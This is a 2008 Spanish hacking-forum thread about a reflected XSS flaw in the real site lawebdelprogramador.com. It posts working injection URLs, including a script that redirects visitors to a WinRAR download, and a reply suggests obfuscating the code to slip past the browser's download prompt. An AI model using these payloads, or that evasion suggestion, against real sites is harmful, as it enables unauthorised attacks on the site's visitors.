elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [XSS] lawebdelprogramador
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [XSS] lawebdelprogramador  (Leído 4,652 veces)
Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
[XSS] lawebdelprogramador
« en: 12 Abril 2008, 01:48 am »

la web del programador no tiene sistema de usuarios asi que creo que esto no haga ningun mal... si se puede hacer daño aliento a que NO lo hagan eso solo lo hago con el fin de aprender...

esto si funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(5)</script>

esto no funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(vulnerable)</script>

porque? hay que codificar el texto de algun modo? hay algun tipo de filtro?
y que se puede lograr en un ataque de este tipo a una web que no tiene usuarios y passwords? robar cookies no tiene ningun sentido aparente o si ?

----- MINUTOS DEPUES ----

JAJAJA esto es groso jajajjaja

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>self.location='http://www.winrar.es/descargas/52';</script>

parece como que descarga el winrar desde la web del programador jajajjaja

esta bueno, perdon por la alegria pero es la primera vez que hago algo asi jajaj

ahora le veo muchas utilidades!  :xD :xD :xD

« Última modificación: 12 Abril 2008, 12:31 pm por Achernar » En línea

marlon_agz


Desconectado Desconectado

Mensajes: 987


Encontre el origen de los Emos xD


Ver Perfil WWW
Re: [XXS] lawebdelprogramador
« Respuesta #1 en: 12 Abril 2008, 01:58 am »

felicidades :)

leyendo se logran muuuuchas cosas   jejeje

salu2
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: [XXS] lawebdelprogramador
« Respuesta #2 en: 12 Abril 2008, 02:23 am »

Antes de la descarga existe un "POP ALLOW" tanto en firefox como en IE, para un usuario dummie, lo pasaria por alto y el XSS de nada serviria :D, podria ofuscarse un poco mas el code para forzar al nevegador y que no se observe el POP.

-berz3k.

En línea

Ferсhu


Desconectado Desconectado

Mensajes: 1.215

Menos palabras y Mas codigos.


Ver Perfil WWW
Re: [XXS] lawebdelprogramador
« Respuesta #3 en: 12 Abril 2008, 02:24 am »

Citar

eso si funcionaria si estuviera bien escrito, faltan las ' '.

creo q es xss no xxs, pero es una tonteria jej :p

Para poner bugs en el foro, tenes q poner todo la info en una web tuya, y en el post, poner el link citandose esa web, para desligar al foro, creo q es por precausion solamente, pero es una norma.




En línea

Securitykill

Desconectado Desconectado

Mensajes: 15


Ver Perfil
Re: [XXS] lawebdelprogramador
« Respuesta #4 en: 12 Abril 2008, 02:28 am »

Pues ya han tenido varios XSS :P

Código:
http://www.xssed.com/mirror/29013/

Saludos
En línea

Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
Re: [XSS] lawebdelprogramador
« Respuesta #5 en: 12 Abril 2008, 12:57 pm »

creo q es xss no xxs, pero es una tonteria jej :p

solucionado, Gracias  ;D.


Antes de la descarga existe un "POP ALLOW" tanto en firefox como en IE, para un usuario dummie, lo pasaria por alto y el XSS de nada serviria :D, podria ofuscarse un poco mas el code para forzar al nevegador y que no se observe el POP.

-berz3k.



Como se podria hacer eso? aprovechando otro bug? o con un script se puede?



Para poner bugs en el foro, tenes q poner todo la info en una web tuya, y en el post, poner el link citandose esa web, para desligar al foro, creo q es por precausion solamente, pero es una norma.


Nu sabia, si hay que borrar el post esta todo bien :]
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines